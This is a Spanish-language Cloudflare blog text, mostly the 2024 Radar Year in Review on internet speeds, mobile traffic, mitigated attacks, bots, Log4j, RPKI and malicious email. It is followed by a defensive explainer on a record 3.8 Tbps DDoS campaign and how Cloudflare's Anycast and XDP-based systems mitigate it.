A medida que cada vez más actividades de nuestra vida cotidiana se hacen en línea, como el entretenimiento, el trabajo, la educación, las finanzas, las compras e incluso la interacción social y personal básica, la calidad de nuestras conexiones a Internet es posiblemente más importante que nunca, lo que exige mayores velocidades de conexión y menor latencia. Si bien los proveedores de servicios de Internet continúan ampliando sus carteras de servicios para ofrecer mayores velocidades de conexión y menor latencia para apoyar el uso creciente como las videoconferencias, la transmisión en directo y los videojuegos en línea, la adopción por parte de los consumidores suele ser desigual debido al costo, la disponibilidad u otros problemas. Al agregar los resultados de las pruebas despeed.cloudflare.com que se hicieron durante 2024, podemos obtener una perspectiva geográfica de las métricas de calidad de la conexiónincluidas las velocidades promedio de carga y descarga, las latencias promedio inactivas y cargadas, y la distribución de las mediciones.

En 2024, España fue líder en métricas de velocidad de descarga (292,6 Mbps) y velocidad de carga (192,6 Mbps), y ocupó el segundo lugar a nivel mundial en latencia cargada (78,6 ms). (La latencia de carga es el tiempo de ida y vuelta cuando se utilizan aplicaciones con muchos datos en la red). El liderazgo de España en estas métricas de calidad de la conexión se debe en gran medida al progreso que ha hecho el país para lograr los objetivos de la "Década digital" de la UE, como la implementación de la red fija de muy alta capacidad (VHCN), la cobertura de fibra hasta las instalaciones (FTTP), y la cobertura 5G, alcanzando estas dos últimas el 95,2 % y el 92,3 %, respectivamente. Las conexiones de banda ancha de fibra de alta velocidad también son relativamente asequibles, y las investigaciones demuestran que los principales proveedores ofrecen paquetes de 100 Mbps, 300 Mbps, 600 Mbps y 1 Gbps, con un precio que oscila entre 30 y 46 euros al mes. Las siguientes cifras de España muestran los mayores clusters de mediciones de velocidad en torno a los 100 Mbps, con ligeros saltos también visibles en torno a los 300 Mbps, lo que sugiere que el primer paquete tiene la tasa de suscripción más alta, seguido del segundo. Además, muestran que estas conexiones también tienen una latencia relativamente baja, con el 87 % de las mediciones de latencia en reposo por debajo de los 50 ms y el 65 % de las mediciones de latencia en carga por debajo de los 100 ms, lo que aporta a los usuarios buenas experiencias para videojuegos y videoconferencias/streaming..

^{Distribución de la velocidad de carga/descarga medida en España en 2024}

^{Distribución de la latencia inactiva/cargada medida en España en 2024}

Aproximadamente el 70 % de la población mundial utiliza teléfonos inteligentes y el 91 % de los estadounidenses tienen un teléfono inteligente, por lo tanto, estos dispositivos móviles han pasado a ser fundamentales tanto para nuestra vida personal como profesional, facilitándonos el acceso a Internet desde prácticamente cualquier lugar y en cualquier momento. En algunos países/regiones, los dispositivos móviles se conectan a Internet principalmente a través de Wi-Fi, mientras que otros países/regiones son "mobile first", donde los servicios 4G/5G son el principal medio de acceso a Internet .

El análisis de la información del agente de usuario notificado con cada solicitud a Cloudflare nos permite clasificarla como procedente de un dispositivo móvil, de escritorio u otro tipo de dispositivo. Si agregamos esta clasificación durante el año a nivel global, comprobamos que el 41,3 % del tráfico procedía de dispositivos móviles, y el 58,7 % de dispositivos de escritorio, como portátiles y PC "clásicos". Estos porcentajes de tráfico eran acordes con los medidos en 2023 y 2022, lo que sugiere que el uso de dispositivos móviles ha alcanzado un "nivel de estabilidad". Más del 77 % del tráfico proviene de dispositivos móviles en Sudán, Cuba y Siria, lo que los convierte en los países/regiones con el mayor porcentaje de tráfico de dispositivos móviles en 2024. Otros países/regiones en los que más del 50 % del tráfico proviene de dispositivos móviles se concentran en Oriente Medio/África, la región de Asia Pacífico y América del Sur/Central. 

^{Distribución global del tráfico por tipo de dispositivo en 2024}

^{Países/regiones con mayor porcentaje de uso de dispositivos móviles en 2024}

Cloudflare se encuentra en una posición única para ayudar a medir el estado y el comportamiento de las redes de Internet en todo el mundo. Una forma de hacerlo es midiendo de forma pasiva las velocidades de las conexiones a Cloudflare que parecen anómalas, es decir que se interrumpen de manera inesperada antes de que sea posible intercambiar datos útiles. Las causas subyacentes de las anomalías de conexión son variadas y van desde ataques DoS hasta comportamientos extraños de los clientes y la manipulación de conexiones por parte de terceros (por ejemplo, cuando una red supervisa e interrumpe selectivamente las conexiones para filtrar contenido).

Las anomalías de conexión son síntomas, signos visibles de que "algo anormal" está ocurriendo en una red, pero la causa subyacente no siempre está clara desde el principio. Sin embargo, podemos comprenderlos mejor incorporando los comportamientos de red informados previamente, las mediciones activas y los informes sobre el terreno, y macrotendencias en todas las redes. Puedes encontrar más detalles sobre este análisis en las publicaciones del blog Una evaluación global de la manipulación de conexiones por parte de terceros yInformación sobre reinicios y tiempos de espera de TCP en Cloudflare Radar.

La información sobre las anomalías en conexiones TCP se publicó en Cloudflare Radar en septiembre, y las líneas del gráfico asociado corresponden a la fase de la conexión TCP en la que la conexión se interrumpió de forma anómala (para abreviar, los tres primeros mensajes que solemos recibir del cliente en una conexión TCP son paquetes "SYN" y "ACK" para establecer una conexión, y luego un paquete "PSH" que indica el recurso solicitado). En conjunto, a nivel mundial, más del 20 % de las conexiones a Cloudflare se interrumpieron de forma inesperada, y la mayor parte (casi la mitad) se cerraron "Post SYN", es decir, después de que nuestro servidor recibiera un paquete SYN del cliente, pero antes de que recibiéramos un reconocimiento (ACK) posterior del cliente o cualquier dato útil que siguiera al reconocimiento. Estas terminaciones a menudo se pueden atribuir a ataques DoS o a exploraciones de Internet . Las anomalías posteriores a ACK (3,1 % a nivel mundial) y posteriores a PSH (1,4 % a nivel mundial) se asocian con mayor frecuencia con la manipulación de conexiones, especialmente cuando se producen a un ritmo elevado en redes específicas.

^{Tendencias de las anomalías de conexión TCP por etapas en 2024}

Para proteger a los clientes de las amenazas que plantean los bots maliciosos utilizados para atacar sitios web y aplicaciones, Cloudflare mitiga este tráfico de ataque con técnicas de mitigación de DDoSo reglas administradas del firewall de aplicaciones web (WAF). Por otras razones, los clientes también pueden necesitar que Cloudflare mitigue el tráfico utilizando técnicas como la limitación de velocidad de las solicitudes o el bloqueo de todo el tráfico de una ubicación determinada, incluso si no es malicioso. Al analizar el tráfico a la red de Cloudflare durante 2024, observamos el porcentaje total que se mitigó por cualquier motivo, así como el porcentaje que se bloqueó como un ataque DDoS o por reglas administradas por WAF . 

En 2024, se mitigó el 6,5 % del tráfico global, casi un punto porcentual más que en 2023. Solo el 3,2 % se mitigó como ataque DDoS, o por reglas administradas por WAF, una tasa ligeramente superior a la de 2023. A más del 10 % del tráfico procedente de 44 países/regiones se les aplicaron mitigaciones de DDoS/WAF en general, mientras que las mitigaciones de DDoS/ WAF se aplicaron a más del 10 % del tráfico procedente de solo siete países/regiones.

A nivel de país/región, Albania tuvo uno de los mayores porcentajes de tráfico mitigado a lo largo del año, con un 42,9 %, mientras que Libia tuvo uno de los mayores porcentajes de tráfico mitigado como un ataque DDoS o mediante reglas administradas por WAF, con un 19,2 %.. En la publicación del blog del Resumen del año 2023, destacamos a Estados Unidos y Corea. Este año, el porcentaje de tráfico mitigado creció hasta el 5,0 % en Estados Unidos (frente al 3,65 % en 2023), mientras que en Corea del Sur cayó ligeramente al 8,1 %, frente al 8,36 %.

^{Tendencias del tráfico mitigado en todo el mundo en 2024}

El tráfico debots describe cualquier tráfico de Internet no humano, y mediante el control de tráfico que se sospecha que proviene de bots, los propietarios de sitios y aplicaciones pueden detectar y, si es necesario, bloquear actividades potencialmente maliciosas. Sin embargo, no todos los bots son maliciosos — los bots también pueden ser útiles, y Cloudflare mantiene una lista de bots verificados que incluye los que se utilizan para cosas como la indexación de motores de búsqueda, las pruebas de rendimiento y la supervisión de la disponibilidad. Independientemente de la intención, analizamos de dónde se originaba el tráfico de bots en 2024, utilizando la dirección IP de una solicitud para identificar la red (sistema autónomo) y el país/región asociados con el bot que hacía la solicitud. Las plataformas en la nube se mantuvieron entre las principales fuentes de tráfico de bots debido a una serie de factores. Estos incluyen la facilidad de uso de herramientas automatizadas para aprovisionar rápidamente los recursos informáticos, el costo relativamente bajo de utilizar estos recursos informáticos de forma efímera, el espacio geográfico ampliamente distribuido de las plataformas en la nube y la conectividad a Internet con gran ancho de banda de las plataformas.

A nivel mundial, 68,5 % del tráfico de bots observado procedía de los 10 principales países en 2024, siendo Estados Unidos responsable de la mitad de ese total, más de 5 veces la participación de Alemania, que ocupa el segundo lugar. (En comparación con 2023, la participación de Estados Unidos aumentó ligeramente, mientras que la de Alemania disminuyó ligeramente). Entre las plataformas en la nube que originan el tráfico de bots, Amazon Web Services fue responsable del 12,7 % del tráfico global de bots, y el 7,8 % procedía de Google. Microsoft, Hetzner, Digital Ocean y OVH también contribuyeron con más del 1 % cada una.

^{Distribución de tráfico de bots a nivel global por país de origen.}

^{Distribución de tráfico de bots a nivel global por red de origen.}

Las industrias objetivo de los ataques suelen cambiar con el tiempo, según el propósito de los atacantes. Es posible que quieran causar daños financieros al atacar a sitios de comercio electrónico durante un intenso período de compras, o quizás la intención sea hacer una declaración política al atacar sitios relacionados con los gobiernos. Para identificar la actividad de los ataques a las industrias objetivo durante 2024, analizamos el tráfico mitigado de clientes que tenían una industria asociada y vertical en su registro de clientes. El tráfico mitigado se agregaba semanalmente por país/región de origen en 19 industrias objetivo.

Las empresas del sector de las apuestas/videojuegos fueron, en conjunto, las más afectadas durante 2024, y el 6,6 % del tráfico global mitigado estaba dirigido a este sector. El sector superó ligeramente al sector financiero, que lideró la lista de 2023. (Ambos sectores se muestran con un 6,6 % en la vista Resumen debido al redondeo).  Los sitios de apuestas/videojuegos registraron la mayor parte del tráfico mitigado en enero y la primera semana de febrero, posiblemente relacionado con las eliminatorias de la Liga Nacional de Fútbol de Estados Unidos, antes del Super Bowl.

Los ataques contra organizaciones financieras fueron más activos en mayo, alcanzando un pico del 15,3 % del tráfico mitigado en la semana del 13 de mayo. Esto coincide con la cifra de nuestro informe sobre amenazas DDoS correspondiente al segundo trimestre de 2024, que muestra que los servicios financieros fueron el sector más afectado por volumen de solicitudes durante el trimestre en Sudamérica y la región de Oriente Medio.

Como hemos visto en el pasado, los picos de actividad de los ataques variaron semanalmente según el sector. Los picos más altos del año se observaron en los ataques contra organizaciones de personas y sociedades (19,6 % del tráfico mitigado, semana del 1 de enero), el sector de automóviles y vehículos (29,7 % del tráfico mitigado, semana del 15 de enero) y el sector inmobiliario. (27,5 % del tráfico mitigado, semana del 26 de agosto).

^{Participación en el tráfico mitigado a nivel mundial por sector en 2024, vista resumida}

En diciembre de 2021, publicamos una serie de entradas en el blog sobre la vulnerabilidad Log4j, destacando la amenaza que suponía, nuestras observaciones de intentos de explotación y las medidas que adoptamos para proteger a los clientes. Dos años después, en nuestro Resumen del Año 2023, observamos que, a pesar de ser una vulnerabilidad anterior, Log4j siguió siendo uno de los principales objetivos de los ataques durante 2023, y la actividad de los ataques relacionados fue significativamente mayor que otras vulnerabilidades que se aprovechan comúnmente.

En 2024, tres años después de la revelación inicial de Log4j, descubrimos que Log4j sigue siendo una amenaza activa. Este año, comparamos la actividad de ataque diaria normalizada de Log4j con la actividad de ejecución remota de código por inyección de Atlassian Confluence, una vulnerabilidad que examinamos en el Resumen del Año 2023, así como la actividad de ataque diaria agregada para múltiples CVE relacionadas con las vulnerabilidades de omisión de autenticación y ejecución remota de código publicadas en 2024.

La actividad de los ataques Log4j pareció tender en general al alza a lo largo del año, con varios picos significativos visibles durante la primera mitad del año, y de nuevo en octubre y noviembre. En cuanto a la diferencia de actividad, Log4j oscila entre aproximadamente 4 y más de 20 veces la actividad observada para la inyección de código de Atlassian Confluence, y hasta 100 veces la actividad agregada observada para las vulnerabilidades de omisión de autenticación o inyección remota de código.  

^{Tendencias de actividad de ataques a nivel global para vulnerabilidades que se aprovechan comúnmente en 2024}

Como protocolo de enrutamiento que da sustento a Internet, Border Gateway Protocol (BGP) comunica las rutas entre redes, lo que permite que el tráfico fluya entre el origen y el destino. Sin embargo, como BGP depende de la confianza entre las redes, la información incorrecta compartida entre los pares se basa en la confianza entre redes, y la información incorrecta compartida entre pares, ya sea intencional o no, puede enviar el tráfico al lugar incorrecto, posiblemente con resultados engañososResource Public Key Infrastructure (RPKI) es un método criptográfico de firma de registros que asocia un anuncio de ruta BGP con el número AS de origen correcto del sistema autónomo, lo que facilita una forma de garantizar que la información que se comparte originalmente proviene de una red con permiso para hacerlo. (Es importante tener en cuenta que esto es solo la mitad del desafío de implementar la seguridad de enrutamiento, ya que los proveedores de servicios de red también deben validar estas firmas y filtrar los anuncios no válidos para evitar que se sigan compartiendo).

Cloudflare ha sido durante mucho tiempo un arduo defensor de la seguridad de enrutamiento, ya que fue fundador participante de MANRS CDN y Cloud Programme y suministra una herramienta pública que permite a los usuarios probar si su proveedor de Internet ha implementado BGP de forma segura. Basándonos en la información disponible en la página enrutamiento de Cloudflare Radar, analizamos los datos del archivo diario de RPKI de RIPE NCC para determinar el porcentaje de rutas válidas de RPKI (a diferencia de los anuncios de ruta que son inválidos o cuyo estado es desconocido) y cómo esa participación ha cambiado durante 2024, así como determinar la participación de espacio de direcciones IP cubierto por rutas válidas. Esta última métrica es interesante, porque un anuncio de ruta que cubra una cantidad significativa de espacio de direcciones IP (millones de direcciones IPv4, por ejemplo) tiene un impacto potencial mayor que un anuncio que cubra un pequeño bloque de espacio de direcciones IP (cientos de direcciones IPv4, por ejemplo).

A nivel global, durante 2024 observamos un aumento de 6,4 puntos porcentuales (del 43,4 % al 49,8 %) en las rutas IPv4 válidas, y un aumento de 3,2 puntos porcentuales (del 53,7 % al 56,9 %) en las rutas IPv6 válidas. Dada la trayectoria, es probable que más de la mitad de las rutas IPv4 sean válidas para RPKI a fines del 2024. En cuanto al porcentaje global de espacio de direcciones IP cubierto por rutas válidas, observamos un aumento de 4,7 puntos porcentuales (del 38,9 % al 43,6 %) para IPv4, y de 3,3 puntos porcentuales (del 57,6 % al 60,9 %) para IPv6.

^{Porcentaje de entradas de enrutamiento válidas de RPKI global por versión de dirección IP en 2024}

^{Porcentaje del espacio de direcciones IP anunciadas globalmente cubiertas por rutas válidas de RPKI en 2024}

España comenzó 2024 con menos de la mitad de sus rutas (tanto IPv4 como IPv6) RPKI válidas. Sin embargo, la participación de rutas válidas creció significativamente el 15 de febrero, cuando AS12479 (Orange Espagne) firmó registros asociados con el 98 % de sus prefijos de dirección IP que anteriormente estaban en estado "desconocido" (o NotFound) de validez RPKI, convirtiendo así estos prefijos de desconocidos a válidos. Esto impulsó un aumento inmediato de IPv4 al 76 %, alcanzando el 81 % de validez el 1 de diciembre, y un aumento inmediato de IPv6 al 91 %, alcanzando el 92,9 % de validez el 1 de diciembre. Un cambio notable en el espacio de direcciones IP cubierto se observó en Camerún, donde el espacio IPv4 cubierto se duplicó con creces a fines de enero, pasando del 32 % al 82 %. Esto se debió a que AS36912 (Orange Cameroun) firmó registros asociados con todos sus prefijos de dirección IPv4, cambiando el espacio de direcciones IP asociado a RPKI válido. 

^{La participación de IPv4 e IPv6 en las rutas válidas de RPKI para España en 2024}

^{Participación del espacio de direcciones IPv4 cubierto por rutas válidas RPKI para Camerún en 2024}

A pesar del creciente uso aplicaciones de colaboración/mensajería por parte de las empresas, el correo electrónico sigue siendo una importante aplicación empresarial y es un punto de entrada a las redes empresariales muy atractivo para los atacantes. Los atacantes envían correos electrónicos maliciosos que intentan hacerse pasar por un remitente legítimo (como un ejecutivo corporativo) para que el usuario haga clic en un enlace engañoso, o correos electrónicos que contienen un archivo adjunto peligroso, entre otros tipos de amenazas. Cloudflare Email Security protege a los clientes de los ataques al correo electrónico, incluidos los que se llevan a cabo a través de mensajes de correo electrónico maliciosos selectivos. Durante 2024, se descubrió que un promedio del 4,3 % de los correos electrónicos analizados por Cloudflare eran maliciosos. A nivel semanal, se observaron picos superiores al 14 % a fines de marzo, principios de abril y mediados de mayo. Creemos que estos picos estaban relacionados con ataques selectivos de "retrodifusión", en los que el atacante inundaba un objetivo con mensajes imposibles de entregar, que luego rebotaban al destinatario, cuyo correo electrónico se había configurado como la dirección de respuesta.

^{Tendencias globales de participación de correos electrónicos maliciosos en 2024}

Los atacantes utilizan una variedad de técnicas, a las que nos referimos como categorías de amenaza, cuando utilizan mensajes de correo electrónico maliciosos como vector de ataque. Estas categorías se definen y analizan en detalle en nuestro informe sobre las amenazas de phishing. En nuestro análisis de los correos electrónicos maliciosos, hemos descubierto que estos mensajes pueden contener varios tipos de amenazas. Al revisar una agregación semanal de las tendencias de la actividad de las amenazas para estas categorías, descubrimos que, en promedio en 2024, el 42,9 % de los mensajes de correo electrónico maliciosos contenían enlaces engañosos, y en ocasiones, la proporción alcanzó el 70 % durante el año. La actividad de esta categoría de hilos fue irregular, con puntos bajos en el periodo de marzo a mayo, y una tendencia general a la baja visible desde julio hasta noviembre.

El fraude de identidad fue una categoría de amenaza igualmente activa, y estas amenazas también se encontraron en hasta el 70 % de los correos electrónicos analizados durante varias semanas durante el año. En promedio, en 2024, el 35,1 % de los correos electrónicos contenían intentos de fraude de identidad. El patrón de actividad de esta categoría de amenaza parece ser algo similar a los enlaces engañosos, con varios picos y valles que se producen durante las mismas semanas. En ocasiones, el fraude de identidad fue una amenaza más frecuente en los correos electrónicos analizados que los enlaces engañosos, como se ve en el gráfico siguiente.

Entre otras categorías de amenaza, la extorsión experimentó el cambio más significativo durante el año. Tras aparecer en el 86 % de los correos electrónicos maliciosos durante la primera semana de enero, su participación disminuyó gradualmente a lo largo del año, y finalizó noviembre por debajo del 10 %.

^{Tendencias globales de las categorías de amenaza de correos electrónicos maliciosos para los enlaces engañosos y el fraude de identidad en 2024}

En marzo de 2024,lanzamos un conjunto de información sobre seguridad del correo electrónico en Cloudflare Radar, como la visibilidad de los llamados "dominios peligrosos", aquellos dominios de nivel superior (TLD) que se descubrió que eran el origen de la mayor parte de los mensajes de correo electrónico no deseado o malicioso. analizada por Cloudflare Email Security. El análisis se basa en el TLD del dominio de envío, que se encuentra en el encabezado De: de un mensaje de correo electrónico. Por ejemplo, si un mensaje procede de sender@example.com, entonces example.com es el dominio de envío, y .com es el TLD asociado.

En conjunto, durante 2024, observamos que los dominios de nivel superior (TLD) .bar, .rest,y .uno fueron los "más peligrosos", cada uno con más del 99 % de los mensajes de correo electrónico analizados que se caracterizaron como no deseados o maliciosos. (Todos estos TLD existen hace al menos una década, y cada uno tiene al menos algún uso, con entre 20 000 y 60 000 nombres de dominio registrados).  Ordenar por recurso compartido de correo electrónico malicioso, el .ws El ccTLD (dominio de nivel superior con código de país) perteneciente a Samoa Occidental ocupó el primer lugar, con más del 90 % de los correos electrónicos analizados que se clasificaron como maliciosos. Por porcentaje de correo electrónico no deseado, el dominio .quest es el mayor infractor, ya que más del 88 % de los correos electrónicos que se originan en dominios asociados se caracterizan como correo no deseado.

^{Los TLD que originaron el mayor porcentaje total de correo electrónico malicioso y no deseado en 2024}

Internet es un organismo increíblemente complejo y dinámico, en constante cambio, crecimiento y evolución.

Con el Resumen del Año 2024 de Cloudflare Radar, ofrecemos información sobre el cambio, el crecimiento y la evolución que hemos medido y observado durante el año. Los gráficos de tendencias, los mapas, las tablas y las estadísticas de resumen ofrecen nuestras perspectivas únicas sobre el tráfico de Internet, la calidad y la seguridad de Internet, y cómo las métricas clave de estas áreas varían en todo el mundo y a lo largo del tiempo.

Te invitamos a visitar el micrositio del Resumen del Año 2024 de Cloudflare Radar y a que explores las tendencias de tu país/región, y consideres cómo afectan a tu organización para que estés adecuadamente preparado para 2025. Además, para conocer los principales servicios de Internet en distintas categorías del sector, te recomendamos leer la publicación complementaria del blog Resumen del Año, de ChatGPT a Temu: clasificación de los principales servicios de Internet en 2024.

Si deseas hacer preguntas, puedes comunicarte con el equipo de Cloudflare Radar en radar@cloudflare.com o en las redes sociales en @CloudflareRadar (X), https://noc.social/@cloudflareradar (Mastodon) y radar.cloudflare.com (Bluesky).

Como cada año, la producción de los datos, el micrositio y el contenido de nuestro Resumen del Año es realmente un trabajo de equipo, quiero agradecer a los integrantes que contribuyeron con la iniciativa este año. Gracias a: Jorge Pacheco, Sabina Zejnilovic, Carlos Azevedo, Mingwei Zhang (Análisis de datos); André Jesus, Nuno Pereira (Desarrollo de front-end); João Tomé (Servicios de Internet más populares); Jackie Dutton, Kari Linder, Guille Lasarte (Comunicación); Eunice Giles (Diseño de marca); Jason Kincaid (Edición del blog); y Paula Tavares (Gestión de ingeniería), así como a muchos otros colegas por sus respuestas, ediciones, apoyo e ideas.

Un ataque DDoS mitigado de 3,8 terabits por segundo que duró 65 segundos

Un ataque DDoS mitigado de 2140 millones de paquetes por segundo que duró 60 segundos

Los clientes de Cloudflare que utilizan los servicios de proxy inverso HTTP de Cloudflare (por ejemplo, el WAF de Cloudflare y la CDN de Cloudflare) están protegidos automáticamente.

Los clientes de Cloudflare que utilizan Spectrum y Magic Transit también están protegidos automáticamente. Los clientes de Magic Transit pueden optimizar aún más su protección implementando reglas de  Magic Firewall para aplicar un estricto modelo de seguridad positiva y negativa en la capa de paquetes.

La escala y la frecuencia de estos ataques no tienen precedentes. Debido a su gran tamaño y sus altas velocidades de bits/paquetes por segundo, estos ataques tienen la capacidad de interrumpir tanto las propiedades de Internet desprotegidas como las propiedades de Internet protegidas por equipos locales o por proveedores en la nube que simplemente carecen de la capacidad de red o de la cobertura global necesarias para gestionar estos volúmenes junto con el tráfico legítimo sin afectar al rendimiento. 

Sin embargo, Cloudflare tiene la capacidad de red, la cobertura global y los sistemas inteligentes necesarios para absorber y mitigar automáticamente estos enormes ataques. 

En esta publicación del blog, revisaremos la campaña de ataques y por qué sus ataques son tan graves. Describiremos la anatomía de un ataque DDoS a la capa 3/4, sus objetivos y cómo se generan los ataques. A continuación, detallaremos cómo los sistemas de Cloudflare fueron capaces de detectar y mitigar de forma autónoma estos enormes ataques sin afectar al rendimiento de nuestros clientes. Describiremos los aspectos clave de nuestras soluciones de protección, desde cómo nuestros sistemas generan firmas en tiempo real (dinámicas) para correlacionar el tráfico de ataque hasta cómo aprovechamos las funciones del kernel para descartar paquetes a velocidad de cable.

Hemos observado esta campaña de ataques dirigida a varios clientes de los sectores de servicios financieros, Internet y telecomunicaciones, entre otros. Esta campaña de ataques tiene como objetivo saturar el ancho de banda y agotar los recursos de las aplicaciones y los dispositivos en línea.

Los ataques utilizaron principalmente UDP en un puerto fijo. Provenían de todo el mundo, pero la mayor parte de ellos procedían de Vietnam, Rusia, Brasil, España y Estados Unidos. 

Los ataques de alta velocidad de paquetes parecen originarse en varios tipos de dispositivos en riesgo, como dispositivos MikroTik, DVR y servidores web, orquestados para trabajar en conjunto e inundar el objetivo con volúmenes de tráfico excepcionalmente grandes. Los ataques de alta velocidad de bits parecen originarse en un gran número de enrutadores domésticos ASUS comprometidos, probablemente explotados mediante una vulnerabilidad CVE 9.8 (crítica) que Censys descubrió recientemente.

^{Porcentaje de paquetes observados por ubicación de origen}

Antes de analizar cómo Cloudflare detectó y mitigó automáticamente los mayores ataques DDoS jamás vistos, es importante comprender los conceptos básicos de los ataques DDoS. 

Diagrama simplificado de un ataque DDoS

El objetivo de un ataque de denegación de servicio distribuido (DDoS) es denegar a los usuarios legítimos el acceso a un servicio. Para ello, los atacantes agotan los recursos que se necesitan para proporcionar el servicio. En el contexto de estos recientes ataques DDoS a las capas 3/4, ese recurso son los ciclos de CPU y el ancho de banda de la red.

El procesamiento de un paquete consume ciclos de CPU. En el caso del tráfico normal (no de ataque), la recepción de un paquete legítimo en un servicio hará que ese servicio realice alguna acción, y distintas acciones requieren distintas cantidades de procesamiento de la CPU. Sin embargo, antes de la entrega de un paquete a un servicio, cada paquete requiere realizar ciertas tareas. Es necesario analizar y procesar los encabezados de los paquetes de la capa 3 para entregar el paquete a la máquina y la interfaz correctas. Los encabezados de los paquetes de la capa 4 deben procesarse y enrutarse al socket correcto (si lo hay). Puede haber varios pasos de procesamiento adicionales que inspeccionen cada paquete. Por lo tanto, si la velocidad de envío de paquetes de un ataque es suficientemente alta, puede potencialmente saturar los recursos de CPU disponibles, por lo que se denegará el servicio a los usuarios legítimos.

Para protegerte contra los ataques de alta velocidad de paquetes, debes poder inspeccionar y descartar los paquetes malos utilizando el menor número posible de ciclos de CPU, dejando suficiente CPU para procesar los paquetes buenos. También tienes la opción de adquirir más CPU, o más rápidas, para realizar el procesamiento, pero ese puede ser un proceso muy largo que conlleva altos costes. 

El ancho de banda de la red es la cantidad total de datos que se pueden entregar a un servidor cada vez. Puedes pensar en el ancho de banda como un conducto para transportar agua. La cantidad de agua que podemos suministrar a través de una pajita es menor que la que podríamos suministrar a través de una manguera de jardín. Si un atacante es capaz de introducir más datos basura en el conducto de los que este puede entregar, tanto los datos malos como los buenos se descartarán en la parte superior, en la entrada del conducto, y el ataque DDoS habrá logrado su objetivo.

La protección contra los ataques que pueden saturar el ancho de banda de la red puede ser difícil porque es muy poco lo que se puede hacer si se está en la parte inferior del conducto saturado. En realidad, tienes muy pocas opciones: puedes conseguir un conducto más grande, puedes encontrar potencialmente una forma de mover el tráfico bueno a un nuevo conducto que no esté saturado o, con suerte. puedes pedir a la parte superior del conducto que deje de enviar algunos o todos los datos al conducto.

Si pensamos en lo que esto significa desde el punto de vista de los atacantes, te darás cuenta de que existen limitaciones similares. Al igual que se necesitan ciclos de CPU para recibir un paquete, también se necesitan ciclos de CPU para crearlo. Si, por ejemplo, el coste de enviar y recibir un paquete fuera el mismo, el atacante necesitaría la misma cantidad de potencia de CPU para generar el ataque que nosotros para defendernos de él. En la mayoría de los casos, esto no es cierto: hay una asimetría de costes, ya que el atacante es capaz de generar paquetes utilizando menos ciclos de CPU de los que se necesitan para recibir esos paquetes. Sin embargo, cabe señalar que la generación de ataques no es gratuita y puede requerir una gran cantidad de potencia de la CPU.

Saturar el ancho de banda de la red puede ser aún más difícil para un atacante. En este caso, el atacante necesita poder generar más ancho de banda del que ha asignado el servicio de destino. En realidad, necesita poder superar la capacidad del servicio receptor. Esto es tan difícil que la forma más común de lograr un ataque de ancho de banda de red es utilizar un método de ataque de reflexión/amplificación, por ejemplo, un ataque de amplificación de DNS. Estos ataques permiten al atacante enviar un paquete pequeño a un servicio intermedio, y el servicio intermedio enviará un paquete grande a la víctima.

En ambos escenarios, el atacante necesita adquirir u obtener acceso a muchos dispositivos para generar el ataque. Estos dispositivos se pueden adquirir de distintas maneras. Pueden ser máquinas de clase servidor de proveedores de nube o servicios de alojamiento, o pueden ser dispositivos en riesgo como DVR, enrutadores y cámaras web que han sido infectados con el malware del atacante. Estas máquinas juntas forman la botnet.

Ahora que entendemos los fundamentos de cómo funcionan los ataques DDoS, podemos explicar cómo Cloudflare puede proteger contra estos ataques.

El primer ingrediente no tan secreto es que la red de Cloudflare se basa en Anycast. En resumen, Anycast permite que varias máquinas de cualquier parte del mundo anuncien una única dirección IP. Un paquete enviado a esa dirección IP lo servirá la máquina más cercana. Esto significa que cuando un atacante utiliza su botnet distribuida para lanzar un ataque, el ataque se recibirá de forma distribuida en toda la red de Cloudflare. Un DVR infectado en Dallas, Texas, enviará paquetes a un servidor de Cloudflare en Dallas. Una cámara web infectada en Londres enviará paquetes a un servidor de Cloudflare en Londres.

Redes Anycast vs Unicast

Además, nuestra red Anycast permite a Cloudflare asignar recursos informáticos y de ancho de banda más cerca de las regiones que más los necesitan. Las regiones densamente pobladas generarán mayores cantidades de tráfico legítimo, y los centros de datos ubicados en esas regiones tendrán más recursos de ancho de banda y de CPU para satisfacer esas necesidades. Las regiones escasamente pobladas generarán naturalmente menos tráfico legítimo, por lo que los centros de datos de Cloudflare en esas regiones se pueden dimensionar adecuadamente. Dado que el tráfico de ataque procede principalmente de dispositivos en riesgo, estos dispositivos tenderán a distribuirse de forma que coincida con los flujos de tráfico normales, enviando el tráfico de ataque de forma proporcional a los centros de datos que puedan gestionarlo. De la misma forma, en el centro de datos el tráfico se distribuye entre varias máquinas.

Además, para los ataques de ancho de banda alto, la red de Cloudflare ofrece otra ventaja. Una gran proporción del tráfico en la red de Cloudflare no consume ancho de banda de forma simétrica. Por ejemplo, una solicitud HTTP para obtener una página web de un sitio detrás de Cloudflare será un paquete entrante relativamente pequeño, pero devolverá una mayor cantidad de tráfico saliente al cliente. Esto significa que la red de Cloudflare tiende a enviar mucho más tráfico legítimo del que recibimos. No obstante, los enlaces de red y el ancho de banda asignado son simétricos, lo que significa que hay mucho ancho de banda de entrada disponible para recibir el tráfico de ataque volumétrico.

Cuando llegas a un servidor individual dentro de un centro de datos, el ancho de banda del ataque se ha distribuido lo suficiente como para que ninguno de los enlaces ascendentes esté saturado. Eso no significa que el ataque se haya detenido por completo, ya que no hemos descartado los paquetes maliciosos. Para ello, debemos obtener una muestra del tráfico, calificar un ataque y crear reglas para bloquear los paquetes maliciosos. 

El encargado de obtener una muestra del tráfico y de descartar los paquetes malos es nuestro componente l4drop, que utiliza XDP (eXpress Data Path) y aprovecha una versión ampliada de Berkeley Packet Filter, eBPF (BFP ampliado). Esto nos permite ejecutar código personalizado en el espacio del kernel y procesar (descartar, reenviar o modificar) cada paquete directamente en el nivel de la tarjeta de interfaz de red (NIC). Este componente ayuda al sistema a descartar paquetes de forma eficiente sin consumir excesivos recursos de CPU en la máquina. 

Descripción general del sistema de protección contra DDoS de Cloudflare

Utilizamos XDP para muestrear los paquetes y buscar atributos sospechosos que indiquen un ataque. Las muestras incluyen campos como la dirección IP de origen, el puerto de origen, la dirección IP de destino, el puerto de destino, el protocolo, los indicadores TCP, el número de secuencia, las opciones, la velocidad de paquetes y más. Este análisis lo realiza el daemon de denegación de servicio (dosd). Dosd es nuestro ingrediente secreto. Tiene muchos filtros que le indican, en función de nuestra heurística seleccionada, cuándo iniciar la mitigación. Para nuestros clientes, estos filtros se agrupan lógicamente por vectores de ataque y se exponen como reglas administradas de DDoS. Nuestros clientes pueden personalizar su comportamiento en cierta medida, según sea necesario.

